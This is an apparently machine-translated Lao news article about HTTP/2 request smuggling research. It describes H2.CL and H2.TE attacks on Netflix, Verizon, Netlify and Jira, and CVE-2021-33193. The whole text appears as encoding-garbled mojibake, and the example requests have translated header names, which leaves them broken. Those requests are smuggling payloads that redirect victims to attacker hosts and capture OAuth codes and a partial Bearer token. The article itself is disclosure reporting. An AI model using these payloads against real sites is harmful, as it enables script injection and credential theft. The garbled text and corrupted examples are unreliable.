เบฅเบฐเบเบปเบเปเบงเบฑเบเบเบตเป frontend เบเบญเบกเบฎเบฑเบเบเบฒเบเปเบเบทเปเบญเบกเบเปเปเบเปเบฒเบ HTTP/2 เปเบฅเบฐเบชเบปเปเบเปเบเบซเบฒ backend เบเปเบฒเบ HTTP/1.1 เปเบเปเบเบทเบเปเบเบตเบเปเบเบตเบเบเบฑเบเบเบปเบงเปเบเปเบซเบกเปเบเบญเบเบเบฒเบเปเบเบกเบเบต HTTP Request Smuggling, เปเบเบดเปเบเบญเบฐเบเบธเบเบฒเบเปเบซเป, เปเบเบเบเบฒเบเบชเบปเปเบเบเปเบฒเบฎเปเบญเบเบเปเบฅเบนเบเบเปเบฒเบญเบญเบเปเบเบเบเบดเปเบชเบ, เปเบเบปเปเบฒเปเบเปเบเปเบเบทเปเบญเปเบ. เบเบญเบเบเบฒเบเบฎเปเบญเบเบเปเบเบฒเบเบเบนเปเปเบเปเบญเบทเปเบเปเบเบตเปเบเบฐเบกเบงเบเบเบปเบเปเบเบเบฐเปเบชเบเบฝเบงเบเบฑเบเบฅเบฐเบซเบงเปเบฒเบ frontend เปเบฅเบฐ backend. เบเบฒเบเปเบเบกเบเบตเบชเบฒเบกเบฒเบเบเบทเบเบเปเบฒเปเบเปเปเบเบทเปเบญเปเบชเปเบฅเบฐเบซเบฑเบ JavaScript เบเบตเปเปเบเบฑเบเบญเบฑเบเบเบฐเบฅเบฒเบเปเบเบปเปเบฒเปเบเปเบเปเบเบเบเบฑเบเบเบตเปเบกเบตเปเบงเบฑเบเปเบเบเปเบเบตเปเบเบทเบเบเปเบญเบ, เบเปเบฒเบกเบฅเบฐเบเบปเบเบเบฒเบเบเบงเบเบเบธเบกเบเบฒเบเปเบเบปเปเบฒเปเบเบดเบ, เปเบฅเบฐเบเบฑเบเบเบงเบฒเบเบเบปเบงเบเปเบฒเบเบปเบเบเบฒเบเบขเบทเบเบขเบฑเบ.
เบเบฑเบเบซเบฒเบกเบตเบเบปเบเบเปเปเบเบนเปเปเบเปเปเบงเบฑเบ, เบเบปเบงเบเบธเปเบเบเปเบฝเบเบเบฒเบเปเบซเบผเบ, เบเบปเบงเปเบฅเบฑเปเบเปเบงเบฑเบ, เบฅเบฐเบเบปเบเบเบฒเบเบเบฑเบเบชเบปเปเบเปเบเบทเปเบญเบซเบฒ เปเบฅเบฐเบเบฒเบเบเบฑเปเบเบเปเบฒเบญเบทเปเบเปเบเบตเปเบเบฒเบเบฎเปเบญเบเบเปเบเบทเบเบเปเบฝเบเปเบชเบฑเปเบเบเบฒเบเบเบฒเบกเปเบเบเบเบฒเบเบเปเบฒเบเปเปเบฒ-เบเปเบฒเบ-เบซเบผเบฑเบ. เบเบนเปเบเบฝเบเบเบญเบเบเบฒเบเบชเบถเบเบชเบฒเปเบเปเบชเบฐเปเบเบเปเบซเปเปเบซเบฑเบเบเบงเบฒเบกเบชเบฒเบกเบฒเบเปเบเบเบฒเบเปเบเบกเบเบตเบฅเบฐเบเบปเบเปเบ Netflix, Verizon, Bitbucket, Netlify CDN เปเบฅเบฐ Atlassian, เปเบฅเบฐเปเบเปเบฎเบฑเบ $ 56 เปเบเปเบเบเบเบฒเบ bounty เบเปเบญเบเปเบซเบงเป. เบเบฑเบเบซเบฒเบเบฑเบเปเบเปเบฎเบฑเบเบเบฒเบเบขเบทเบเบขเบฑเบเปเบเบเบฐเบฅเบดเบเบเบฐเบเบฑเบ F5 Networks. เบเบฑเบเบซเบฒเบเบฒเบเบชเปเบงเบเบกเบตเบเบปเบเบเบฐเบเบปเบเบเปเป mod_proxy เปเบ Apache http server (CVE-2021-33193), เบเบฒเบเปเบเปเปเบเปเบกเปเบเบเบฒเบเบงเปเบฒเบเบฐเบขเบนเปเปเบเบชเบฐเบเบฑเบ 2.4.49 (เบเบนเปเบเบฑเบเบเบฐเบเบฒเปเบเปเบฎเบฑเบเปเบเปเบเบเบฑเบเบซเบฒเปเบเบเบปเปเบเปเบเบทเบญเบเบเบถเบเบชเบฐเบเบฒเปเบฅเบฐเปเบเปเบฎเบฑเบ 3 เปเบเบทเบญเบเปเบเบทเปเบญเปเบเปเปเบเบกเบฑเบ). เปเบ nginx, เบเบงเบฒเบกเบชเบฒเบกเบฒเบเปเบเบเบฒเบเบฅเบฐเบเบธเบชเปเบงเบเบซเบปเบง "เบเบงเบฒเบกเบเบฒเบงเปเบเบทเปเบญเบซเบฒ" เปเบฅเบฐ "เบเบฒเบเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบเบเบฒเบเปเบญเบ" เปเบเปเบงเบฅเบฒเบเบฝเบงเบเบฑเบเปเบเปเบเบทเบเบชเบฐเบเบฑเบเปเบเบเบฒเบเบเปเบญเบเบซเบผเปเบฒเบชเบธเบ (1.21.1). เปเบเบทเปเบญเบเบกเบทเบเบฒเบเปเบเบกเบเบตเปเบเปเบเบทเบเปเบเบตเปเบกเปเบเบปเปเบฒเปเบเบเบธเบเปเบเบทเปเบญเบเบกเบท Burp เปเบฅเบฐเบกเบตเบขเบนเปเปเบเบชเปเบงเบเบเบฐเบซเบเบฒเบ Turbo Intruder.
เบซเบผเบฑเบเบเบฒเบเบเบญเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบเบฒเบเบเบญเบเบงเบดเบเบตเบเบฒเบเปเบซเบกเปเบเบญเบเบเบฒเบเบฎเปเบญเบเบเป wedging เปเบเบปเปเบฒเปเบเปเบเบเบฒเบเบเบฐเบฅเบฒเบเบญเบเปเบกเปเบเบเปเบฒเบเบเบทเบเบฑเบเบเบฑเบเบเปเบญเบเปเบซเบงเปเบเบตเปเปเบเปเบฅเบฐเบเบธเปเบงเปเปเบเบเบเบฑเบเบเบปเปเบเบเบงเปเบฒเบเบฝเบงเบเบฑเบเปเบกเบทเปเบญเบชเบญเบเบเบตเบเปเบญเบ, เปเบเปเบเปเบฒเบเบฑเบเบเปเปเบซเบเปเบฒเบเบตเปเบเบญเบกเบฎเบฑเบเบเบฒเบเบฎเปเบญเบเบเปเบเปเบฒเบ HTTP / 1.1. เบเบทเปเปเบงเปเบงเปเบฒเปเบเปเบเบเบเบฒเบ frontend-backend, เบเบฒเบเบฎเปเบญเบเบเปเบเบญเบเบฅเบนเบเบเปเบฒเปเบกเปเบเปเบเปเบฎเบฑเบเปเบเบ node เปเบเบตเปเบกเปเบเบตเบก - frontend, เปเบเบดเปเบเบชเปเบฒเบเบเบฒเบเปเบเบทเปเบญเบกเบเปเป TCP เบเบตเปเบกเบตเบเบตเบงเบดเบเบเบฒเบงเบเบฑเบ backend เบเบตเปเบเปเบฒเปเบเบตเบเบเบฒเบเปเบเบเบเบปเบเบเบฑเบเบเปเบฒเบฎเปเบญเบเบเป. เปเบเบเบเปเบฒเบเบเบฒเบเปเบเบทเปเบญเบกเบเปเปเบเบปเปเบงเปเบเบเบตเป, เบเบฒเบเบฎเปเบญเบเบเปเบเบฒเบเบเบนเปเปเบเปเบเบตเปเปเบเบเบเปเบฒเบเบเบฑเบเบกเบฑเบเบเบฐเบเบทเบเบชเบปเปเบเบเปเป, เปเบเบดเปเบเบเบฐเบเบดเบเบฑเบเบเบฒเบกเบฅเบฐเบเบปเบเบเปเบญเบเปเบชเปเบซเบเบถเปเบเบซเบผเบฑเบเบเบฒเบเบเบตเปเบญเบทเปเบ, เปเบเบเบญเบญเบเปเบเบเบงเบดเบเบตเบเบฒเบ HTTP protocol.
เบเบฒเบเปเบเบกเบเบต "HTTP Request Smuggling" เบเบฅเบฒเบชเบชเบดเบเปเบกเปเบเบญเบตเบเปเบชเปเบเบงเบฒเบกเบเบดเบเบเบตเปเบงเปเบฒ frontends เปเบฅเบฐ backends เบเบตเบเบงเบฒเบกเปเบฒเบเบเบญเบเบเบฒเบเปเบเป HTTP headers "Content-Length" (เบเปเบฒเบเบปเบเบเบฐเบซเบเบฒเบเบเบฑเบเบซเบกเบปเบเบเบญเบเบเปเปเบกเบนเบเปเบเบเปเบฒเบฎเปเบญเบเบเป) เปเบฅเบฐ "Transfer-Encoding: chunked" ( เบญเบฐโเบเบธโเบเบฒเบโเปเบซเปโเบเบฒเบโเปเบญเบโเบเปเปโเบกเบนเบโเปเบโเบเบฒเบโเบชเปเบงเบโ) เบเบตเปโเปเบเบโเบเปเบฒเบโเบเบฑเบโ. เบเบปเบงเบขเปเบฒเบ, เบเปเบฒ frontend เบฎเบญเบเบฎเบฑเบเบเบฝเบเปเบเป "เบเบงเบฒเบกเบเบฒเบงเปเบเบทเปเบญเบซเบฒ" เปเบเปเบเปเปเบชเบปเบเปเบ "Transfer-Encoding: chunked", เบซเบผเบฑเบเบเบฒเบเบเบฑเปเบเบเบนเปเปเบเบกเบเบตเบชเบฒเบกเบฒเบเบชเบปเปเบเบเปเบฒเบฎเปเบญเบเบเปเบเบตเปเบเบฑเบเบชเบญเบเบเบฐเบเบญเบเบกเบต "เบเบงเบฒเบกเบเบฒเบงเบเบญเบเปเบเบทเปเบญเบซเบฒ" เปเบฅเบฐ "เบเบฒเบเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบเบเบฒเบเปเบญเบเบเปเบฒเบ: chunked", เปเบเป. เบเบฐเบซเบเบฒเบเปเบกเปเบ "เบเบงเบฒเบกเบเบฒเบงเบเบญเบเปเบเบทเปเบญเบซเบฒ" เบเปเปเบเบปเบเบเบฑเบเบเบฐเบซเบเบฒเบเบเบญเบเบฅเบฐเบเบปเบเบเปเบญเบเปเบชเป chunked. เปเบเบเปเบฅเบฐเบเบตเบเบตเป, Frontend เบเบฐเบเบฐเบกเบงเบเบเบปเบเปเบฅเบฐเบเปเบฝเบเปเบชเบฑเปเบเบเบฒเบเบเบฒเบเบฎเปเบญเบเบเปเบเบฒเบก "เบเบงเบฒเบกเบเบฒเบงเบเบญเบเปเบเบทเปเบญเบซเบฒ", เปเบฅเบฐ backend เบเบฐเบฅเปเบเปเบฒเปเบซเป block เบชเปเบฒเปเบฅเบฑเบเปเบเบเบญเบตเบเปเบชเป "Transfer-Encoding: chunked" เปเบฅเบฐเบซเบฒเบเบเบตเปเบเบฑเบเปเบซเบผเบทเบญเบเบญเบเบเปเบฒเบฎเปเบญเบเบเปเบเบญเบเบเบนเปเปเบเบกเบเบตเบเบฐเปเบเบฑเบ. เปเบเบเบญเบเบเบปเปเบเบเบญเบเบเบฒเบเบฎเปเบญเบเบเปเบเปเบฒเบเบเบฐเปเบเบเบชเบปเปเบเบเปเปเปเบ.
เบเปเปเปเบซเบกเบทเบญเบเบเบฑเบเปเบเบฃเปเบเบเปเบเปเปเบเบงเบฒเบก HTTP/1.1, เปเบเบดเปเบเบเบทเบเบงเบดเปเบเบฒเบฐเปเบเบฅเบฐเบเบฑเบเปเบเบง, HTTP/2 เปเบเบฑเบเปเบเบฃเปเบเบเปเบเบนเป เปเบฅเบฐเบเบฑเบเบเบฒเบเบเปเปเบกเบนเบเบเบฐเปเบฒเบเบเบตเปเบเบณเบเบปเบเปเบงเปเบฅเปเบงเบเปเปเบฒ. เบขเปเบฒเบเปเบเบเปเบเบฒเบก, HTTP/2 เปเบเป pseudo-headers เบเบตเปเบชเบญเบเบเปเบญเบเบเบฑเบเบชเปเบงเบเบซเบปเบง HTTP เบเบปเบเบเบฐเบเบด. เปเบกเบทเปเบญเปเบเปเบเบญเบเบเบฑเบ backend เบเปเบฒเบ HTTP/1.1, frontend เปเบเบชเปเบงเบเบซเบปเบง pseudo-headers เปเบซเบผเบปเปเบฒเบเบตเปเปเบเบฑเบเบชเปเบงเบเบซเบปเบง HTTP/1.1 HTTP เบเบตเปเบเปเบฒเบเบเบทเบเบฑเบ. เบเบฑเบเบซเบฒเปเบกเปเบเบงเปเบฒ backend เปเบฎเบฑเบเบเบฒเบเบเบฑเบเบชเบดเบเปเบเบเปเบฝเบงเบเบฑเบเบเบฒเบเปเบเบเบชเบฒเบเบเปเปเบฒเปเบเบเบญเบตเบเปเบชเปเบซเบปเบงเบเปเป HTTP เบเบตเปเบเปเบฒเบเบปเบเปเบงเปเปเบเบ frontend, เปเบเบเบเปเปเบฎเบนเปเบเบปเบงเบเปเบฒเบเบปเบเบเบฒเบเบเบญเบเบเปเบฒเบฎเปเบญเบเบเปเบเบปเปเบเบชเบฐเบเบฑเบ.
เบฅเบงเบกเบเบฑเบเปเบเบฎเบนเบเปเบเบเบเบญเบ pseudo-headers, เบกเบนเบเบเปเบฒ "เบเบงเบฒเบกเบเบฒเบงเบเบญเบเปเบเบทเปเบญเบซเบฒ" เปเบฅเบฐ "เบเบฒเบเปเบญเบเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบ" เบชเบฒเบกเบฒเบเบเบทเบเบชเบปเปเบเบเปเป, เปเบเบดเบเบงเปเบฒเบเบฐเบกเบตเบเบงเบฒเบกเบเบดเบเบเบตเปเบงเปเบฒเบเบงเบเบกเบฑเบเบเปเปเบเบทเบเบเปเบฒเปเบเปเปเบ HTTP / 2, เบเบฑเบเบเบฑเปเบเปเบเปเบเบฐเบซเบเบฒเบเบเบญเบเบเปเปเบกเบนเบเบเบฑเบเบซเบกเบปเบเบเบทเบเบเปเบฒเบเบปเบเบขเบนเปเปเบ เบเบฒเบเบชเบฐเบซเบเบฒเบกเปเบเบเบเปเบฒเบเบซเบฒเบ. เบขเปเบฒเบเปเบเบเปเบเบฒเบก, เปเบเบเบฐเบเบงเบเบเบฒเบเบเปเบฝเบเบเปเบฒเบฎเปเบญเบเบเป HTTP / 2 เปเบเบฑเบ HTTP / 1.1, เบซเบปเบงเปเบซเบผเบปเปเบฒเบเบตเปเบเบทเบเบเบฐเบเบดเบเบฑเบเปเบฅเบฐเบชเบฒเบกเบฒเบเบชเบฑเบเบชเบปเบเบเบฑเบ backend. เบกเบตเบชเบญเบเบเบฒเบเปเบฅเบทเบญเบเบเบฒเบเปเบเบกเบเบตเบเบปเปเบเบเป: H2.TE เปเบฅเบฐ H2.CL, เปเบเบเบตเป backend เปเบเปเบเบทเบเบซเบผเบญเบเบฅเบงเบเปเบเบเบเบฒเบเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบเบเบฒเบเปเบญเบเบเบตเปเบเปเปเบเบทเบเบเปเบญเบเบซเบผเบทเบกเบนเบเบเปเบฒเบเบงเบฒเบกเบเบฒเบงเบเบญเบเปเบเบทเปเบญเบซเบฒเบเบตเปเบเปเปเบเบปเบเบเบฑเบเบเบฑเบเบเบฐเบซเบเบฒเบเบเบปเบงเบเบดเบเบเบญเบเบเบปเบงเบฎเปเบญเบเบเปเบเบตเปเปเบเปเบฎเบฑเบเปเบเบ frontend เบเปเบฒเบ. เปเบเบฃเปเบเบเป HTTP/2.
เปเบเบฑเบเบเบปเบงเบขเปเบฒเบเบเบญเบเบเบฒเบเปเบเบกเบเบต H2.CL, เบเบงเบฒเบกเบเบฒเบงเบเบญเบเบซเบปเบงเบเปเป pseudo-header เบเปเปเบเบทเบเบเปเบญเบเปเบกเบทเปเบญเบชเบปเปเบเบเปเบฒเบฎเปเบญเบเบเป HTTP/2 เปเบ Netflix. เบเบฒเบเบฎเปเบญเบเบเปเบเบตเปเปเบฎเบฑเบเปเบซเปเบกเบตเบเบฒเบเปเบเบตเปเบกเบชเปเบงเบเบซเบปเบง HTTP เบเบงเบฒเบกเบเบฒเบงเบเบญเบเปเบเบทเปเบญเบซเบฒเบเบตเปเบเปเบฒเบเบเบทเบเบฑเบเปเบกเบทเปเบญเปเบเบปเปเบฒเปเบเบดเบ backend เบเปเบฒเบ HTTP / 1.1, เปเบเปเปเบเบทเปเบญเบเบเบฒเบเบเบฐเบซเบเบฒเบเบเบญเบเบเบงเบฒเบกเบเบฒเบงเปเบเบทเปเบญเบซเบฒเปเบกเปเบเบซเบเปเบญเบเบเบงเปเบฒเบเบฐเบซเบเบฒเบเบเบปเบงเบเบดเบ, เบเบฒเบเบเปเปเบกเบนเบเปเบเบซเบฒเบเปเบเปเบเบทเบเบเบธเบเปเบเปเบเปเบเบฑเบ. เบเบฒเบเปเบฅเบตเปเบกเบเบปเปเบเบเบญเบเบเบฒเบเบฎเปเบญเบเบเปเบเปเปเปเบ.
เบเบปเบงเบขเปเบฒเบ, เบเบฒเบเบฎเปเบญเบเบเป HTTP/2 :method POST :path /n :authority www.netflix.com content-length 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
เบเบฐเบชเบปเปเบเบเบณเบฎเปเบญเบเบเปเปเบเบเบตเป backend: POST /n HTTP/1.1 Host: www.netflix.com Content-Length: 4 abcdGET /n HTTP/1.1 Host: 02.rs?x.netflix.com Foo: bar
เปเบเบทเปเบญเบเบเบฒเบเบเบงเบฒเบกเบเบฒเบงเบเบญเบเปเบเบทเปเบญเบซเบฒเบเบทเบเบเบฑเปเบเปเบเบฑเบ 4, backend เบเบฐเบเบญเบกเบฎเบฑเบเบเบฝเบเปเบเป "abcd" เปเบเบฑเบเบชเปเบงเบเบเบตเปเบฎเปเบญเบเบเป, เปเบฅเบฐเบเปเบฒเปเบเบตเบเบเบฒเบเบชเปเบงเบเบเบตเปเปเบซเบผเบทเบญเบเบญเบ "GET /n HTTP / 1.1โฆ" เปเบเบฑเบเบเบฒเบเปเบฅเบตเปเบกเบเบปเปเบเบเบญเบเบเปเบฒเบฎเปเบญเบเบเปเบเปเปเปเบเบเบตเปเบเบนเบเบกเบฑเบเบเบฑเบเบเบนเปเปเบเปเบญเบทเปเบ. เบเบฒเบกเบเบฑเปเบเปเบฅเปเบง, เบเบฐเปเบชเบเบฐเบญเบญเบเบเบฒเบเบเบฒเบเบเบดเบ, เปเบฅเบฐเปเบเบทเปเบญเบเบญเบเบชเบฐเบซเบเบญเบเบเปเบฒเบฎเปเบญเบเบเปเบเปเปเปเบ, เบเบปเบเปเบเปเบฎเบฑเบเบเบญเบเบเบฒเบเบเบฐเบกเบงเบเบเบปเบเบเปเบฒเบฎเปเบญเบเบเปเบเบญเบกเบเบฐเบเบทเบเบชเบปเปเบเบเบทเบ. เปเบเบเปเบฅเบฐเบเบตเบเบญเบ Netflix, เบเบฒเบเบฅเบฐเบเบธเปเบเบปเปเบฒเบเบฒเบเบเบญเบเบเบฒเบเบชเปเบงเบเบเบตเบชเบฒเบกเปเบเบซเบปเบงเบเปเป "Host:" เปเบเบเปเบฒเบฎเปเบญเบเบเป spoofed เปเบฎเบฑเบเปเบซเปเปเบเบตเบเบเบฒเบเบเบญเบเบชเบฐเบซเบเบญเบ "เบชเบฐเบเบฒเบเบเบตเป: https://02.rs?x.netflix.com/n" เบเบฑเบเบฅเบนเบเบเปเบฒเปเบฅเบฐ เบญเบฐเบเบธเบเบฒเบเปเบซเปเบชเบปเปเบเปเบเบทเปเบญเบซเบฒเปเบเบเบเบปเบเปเบญเบเปเบเบซเบฒเบฅเบนเบเบเปเบฒ, เบฅเบงเบกเบเบฑเบเบเบฐเบเบดเบเบฑเบเบฅเบฐเบซเบฑเบ JavaScript เบเบญเบเบเปเบฒเบเปเบเบเปเบฅเบดเบเบปเบเบเบญเบเปเบงเบฑเบเปเบเบเป Netflix.
เบเบปเบงเปเบเบเบตเบชเบญเบเบเบญเบเบเบฒเบเปเบเบกเบเบต (H2.TE) เปเบกเปเบเบเปเบฝเบงเบเปเบญเบเบเบฑเบเบเบฒเบเบเบปเบเปเบเบเบเบญเบ "Transfer-Encoding: chunked" header. เบเบฒเบโเบเปเบฒโเปเบเปโเบเบญเบโเบเบฒเบโเปเบญเบโเบเบฒเบโเปเบเบปเปเบฒโเบฅเบฐโเบซเบฑเบ pseudo header เปเบ HTTP / 2 เปเบกเปเบโเบซเปเบฒเบกโเปเบเบโเบชเบฐโเปเบเบฒเบฐโเปเบฅเบฐโเบเปเบฒโเบฎเปเบญเบโเบชเบฐโเบซเบกเบฑเบโเบเบตเปโเบกเบตโเบกเบฑเบโเปเบเปโเบเปเบฒโเบเบปเบโเปเบซเปโเปเบเปโเบฎเบฑเบโเบเบฒเบโเบเบทโเบงเปเบฒโเบเปเปโเบเบทเบโเบเปเบญเบโ. เปเบเบดเบเบงเปเบฒเบเบฐเบกเบตเบชเบดเปเบเบเบตเป, เบเบฒเบเบเบฒเบเบเบฐเบเบดเบเบฑเบเบเปเบฒเบเบซเบเปเบฒเบเปเปเบชเบปเบเปเบเบเบฑเบเบเบงเบฒเบกเบเปเบญเบเบเบฒเบเบเบตเปเปเบฅเบฐเบญเบฐเบเบธเบเบฒเบเปเบซเปเบเปเบฒเปเบเปเบเบฒเบเปเบญเบเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบ pseudo-header เปเบ HTTP/2, เปเบเบดเปเบเปเบเปเบเบฑเบเบชเปเบงเบเบซเบปเบง HTTP เบเบตเปเบเปเบฒเบเบเบทเบเบฑเบ. เบเปเบฒเบกเบตเบชเปเบงเบเบซเบปเบง โTransfer-Encodingโ, backend เบชเบฒเบกเบฒเบเปเบญเบปเบฒเบกเบฑเบเปเบเบฑเบเบเบนเบฅเบดเบกเบฐเบชเบดเบ เปเบฅเบฐ parse เบเปเปเบกเบนเบเปเบเบชเปเบงเบเบเปเบฒเบเปเปเบเปเบซเบกเบ โchunkedโ เปเบเบเปเบเป blocks เบเบญเบเบเบฐเบซเบเบฒเบเบเปเบฒเบเปเปเบเบฎเบนเบเปเบเบ โ{size}\r\n{block} \r\n{size} \r\n{block}\r\n0" เปเบเบดเบเบงเปเบฒเบเบฐเบกเบตเบเบฒเบเปเบเปเบเบเบฑเปเบเบเบปเปเบเบเบฒเบกเบเบฐเปเบฒเบเบฅเบงเบก.
เบเบฒเบเบเบฐเบเบปเบเบเบปเบงเบเบญเบเบเปเบญเบเบซเบงเปเบฒเบเบเบฑเปเบเบเปเบฒเบงเปเบเปเบชเบฐเปเบเบเปเบซเปเปเบซเบฑเบเปเบเบเบเบปเบงเบขเปเบฒเบเบเบญเบ Verizon. เบขเปเบฒเบเปเบเบเปเบเบฒเบก, เบเบฑเบเบซเบฒเบเบตเปเบเปเบฝเบงเบเปเบญเบเบเบฑเบเบเบฐเบเบนเบเบฒเบเบเบงเบเบชเบญเบเบเบงเบฒเบกเบเบทเบเบเปเบญเบเปเบฅเบฐเบฅเบฐเบเบปเบเบเบฒเบเบเบธเปเบกเบเบญเบเปเบเบทเปเบญเบซเบฒ, เปเบเบดเปเบเบเบฑเบเบเบทเบเบเปเบฒเปเบเปเปเบเบเบชเบฐเบเบฒเบเบเบตเปเปเบเบฑเปเบ Huffington Post เปเบฅเบฐ Engadget. เบเบปเบงเบขเปเบฒเบ, เบเบฒเบเบฎเปเบญเบเบเปเบเบญเบเบฅเบนเบเบเปเบฒเบเปเบฒเบ HTTP/2: :method POST :path /identitfy/XUI :authority id.b2b.oath.com เบเบฒเบเปเบญเบเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบ chunked 0 GET /oops HTTP/1.1 Host: psres.net Content-Length: 10 x=
เปเบฎเบฑเบเปเบซเปเปเบเบตเบ HTTP/1.1 เบฎเปเบญเบเบเปเปเบซเป backend: POST /identity/XUI HTTP/1.1 เปเบฎเบช: id.b2b.oath.com Content-Length: 66 Transfer-Encoding: chunked 0 GET /oops HTTP/1.1 เปเบฎเบช: psres.net เปเบเบทเปเบญเปเบ-เบเบงเบฒเบกเบเบฒเบง : 10x=
เปเบเบเบฒเบเบเบฑเบเบเบฑเบ, backend, เบเปเปเบชเบปเบเปเบเบชเปเบงเบเบซเบปเบง "เบเบงเบฒเบกเบเบฒเบงเบเบญเบเปเบเบทเปเบญเบซเบฒ" เปเบฅเบฐเปเบฎเบฑเบเบเบฒเบเปเบเบเบขเบนเปเปเบเบเบฐเปเบชเปเบเบเบญเบตเบเปเบชเป "เบเบฒเบเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบเบเบฒเบเปเบญเบเบเปเบฒเบ: chunked". เปเบเบเบฒเบเบเบฐเบเบดเบเบฑเบ, เบเบฒเบเปเบเบกเบเบตเปเบฎเบฑเบเปเบซเปเบกเบฑเบเปเบเบฑเบเปเบเปเบเปเบเบตเปเบเบฐเบเปเบฝเบเปเบชเบฑเปเบเบเบฒเบเบเบฒเบเบฎเปเบญเบเบเปเบเบญเบเบเบนเปเปเบเปเปเบเบซเบฒเปเบงเบฑเบเปเบเบเบญเบเบเปเบฒเบ, เบฅเบงเบกเบเบฑเบเบเบฒเบเบเบฑเบเบเบงเบฒเบเบเปเบฒเบฎเปเบญเบเบเปเบเบตเปเบเปเบฝเบงเบเปเบญเบเบเบฑเบเบเบฒเบเบเบงเบเบชเบญเบ OAuth, เบเบฒเบฅเบฒเบกเบดเปเบเบตเบเบตเปเบเบฒเบเบปเบเบขเบนเปเปเบเบชเปเบงเบเบซเบปเบงเบเบญเบเบเบนเปเบญเปเบฒเบเบญเบตเบ, เปเบเบฑเปเบเบเบฝเบงเบเบฑเบเบเบฑเบเบเบฒเบเบเปเบฒเบฅเบญเบเบเบญเบเบเบฐเบเบธเบกเบเบฒเบเบเบงเบเบชเบญเบเปเบฅเบฐเบเบฒเบเปเบฅเบตเปเบกเบเบปเปเบเบเบฒเบเบชเบปเปเบเบเปเปเบกเบนเบเบเบฐเบเปเบฒเบเบปเบงเปเบเบเบเบนเปเปเบเป. เบฅเบฐเบเบปเบเบเบฑเบเปเบเบปเปเบฒเบเบฒเบเบเบญเบเบเบนเปเปเบเบกเบเบต. GET /b2blanding/show/oops HTTP/1.1 เปเบเบปเปเบฒเบเบฒเบ: psres.net เบเบนเปเบญเปเบฒเบเบญเบตเบ: https://id.b2b.oath.com/?โฆ&code=secret GET / HTTP/1.1 เปเบเบปเปเบฒเบเบฒเบ: psres.net เบเบฒเบเบญเบฐเบเบธเบเบฒเบ: Bearer eyJhcGwiOiJIUzI1Gi1sInR6cCI6Ik
เปเบเบทเปเบญเปเบเบกเบเบตเบเบฒเบเบเบฐเบเบดเบเบฑเบ HTTP/2 เบเบตเปเบเปเปเบญเบฐเบเบธเบเบฒเบเปเบซเปเบฅเบฐเบเบธเบซเบปเบงเปเบฅเบทเปเบญเบเบเบฒเบเปเบญเบเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบ pseudo-header, เบงเบดเบเบตเบเบฒเบเบญเบทเปเบเปเบเปเบเบทเบเบชเบฐเปเบซเบเบตเบเบตเปเบเปเบฝเบงเบเปเบญเบเบเบฑเบเบเบฒเบเบเปเบฝเบเบชเปเบงเบเบซเบปเบง "Transfer-Encoding" เปเบเบเบเบฒเบเบเบดเบเบกเบฑเบเปเบชเปเบเบฑเบเบซเบปเบง pseudo-headers เบญเบทเปเบเปเบเบตเปเปเบเบเบญเบญเบเปเบเบเบเบปเบงเบญเบฑเบเบชเบญเบเปเบซเบกเป (เปเบกเบทเปเบญเบเบทเบเปเบเบ. เปเบเบดเบ HTTP/1.1 เปเบเบเปเบฅเบฐเบเบตเบเบตเป, เบชเบญเบเบชเปเบงเบเบซเบปเบง HTTP เปเบเบเบเปเบฒเบเบซเบฒเบเปเบกเปเบเบเบทเบเบชเปเบฒเบเบเบถเปเบ).
เบเบปเบงเบขเปเบฒเบ, Atlassian Jira เปเบฅเบฐ Netlify CDN (เปเบเปเปเบเบทเปเบญเบฎเบฑเบเปเบเปเบซเบเปเบฒเปเบฅเบตเปเบกเบเบปเปเบ Mozilla เปเบ Firefox) เปเบเปเบฎเบฑเบเบเบปเบเบเบฐเบเบปเบเบเบฒเบเบเบฑเบเบซเบฒเบเบตเป. เปเบเบเบชเบฐเปเบเบฒเบฐ, เบเบฒเบเบฎเปเบญเบเบเป HTTP/2 : เบงเบดเบเบตเบเบฒเบ POST :path / :authority start.mozilla.org foo b\r\n เบเบฒเบเปเบญเบเปเบเบปเปเบฒเบฅเบฐเบซเบฑเบ: chunked 0\r\n \r\n GET / HTTP/1.1\r\n Host : evil-netlify-domain\r\n เบเบงเบฒเบกเบเบฒเบงเปเบเบทเปเบญเบซเบฒ: 5\r\n \r\nx=
เปเบฎเบฑเบเปเบซเปเบเบฒเบเบฎเปเบญเบเบเป HTTP/1.1 POST / HTTP/1.1 เบเบทเบเบชเบปเปเบเปเบเบซเบฒ backend\r\n Host: start.mozilla.org\r\n Foo: b\r\n Transfer-Encoding: chunked\r\n Content- เบเบงเบฒเบกเบเบฒเบง: 71\ r\n \r\n 0\r\n \r\n GET / HTTP/1.1\r\n Host: evil-netlify-domain\r\n เบเบงเบฒเบกเบเบฒเบงเปเบเบทเปเบญเบซเบฒ: 5\r\n \ r\nx=
เบเบฒเบเปเบฅเบทเบญเบเบญเบทเปเบเบชเปเบฒเบฅเบฑเบเบเบฒเบเบเปเบฝเบเบชเปเบงเบเบซเบปเบง "Transfer-Encoding" เปเบกเปเบเปเบเบทเปเบญเปเบเบเบกเบฑเบเปเบชเปเบเบฑเบเบเบทเปเบเบญเบเบซเบปเบงเบเปเป pseudo-header เบญเบทเปเบเบซเบผเบทเปเบชเปเบชเบฒเบเบเบตเปเบกเบตเบงเบดเบเบตเบเบฒเบเบฎเปเบญเบเบเป. เบเบปเบงเบขเปเบฒเบ, เปเบกเบทเปเบญเปเบเบปเปเบฒเปเบเบดเบ Atlassian Jira, เบเบทเปเบเบญเบเบซเบปเบงเบเปเป pseudo-header "foo: bar\r\ntransfer-encoding" เบเบตเปเบกเบตเบเปเบฒ "chunked" เบชเบปเปเบเบเบปเบเปเบซเปเบกเบตเบเบฒเบเปเบเบตเปเบกเบชเปเบงเบเบซเบปเบง HTTP "foo: bar" เปเบฅเบฐ "transfer-encoding. : chunked", เปเบฅเบฐเบเบฒเบเบฅเบฐเบเบธเปเบ pseudo-header ":method" เบเบญเบเบเปเบฒ "GET / HTTP/1.1\r\nTransfer-encoding: chunked" เบเบทเบเปเบเปเบเบฑเบ "GET / HTTP/1.1\r\ntransfer-encoding: chunked" .
